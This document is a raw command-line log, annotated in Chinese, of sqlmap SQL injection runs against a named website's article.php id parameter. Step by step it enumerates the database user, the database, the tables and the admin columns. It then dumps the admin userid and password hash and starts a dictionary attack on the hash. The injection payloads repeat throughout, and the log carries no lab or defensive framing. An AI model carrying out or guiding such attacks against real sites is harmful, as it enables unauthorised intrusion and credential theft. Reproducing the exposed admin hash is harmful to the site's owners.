D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* 注解:获取当前用户名称
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk' shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /*当前数据库
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk' shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk' shutting down at: 16:55:33
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap>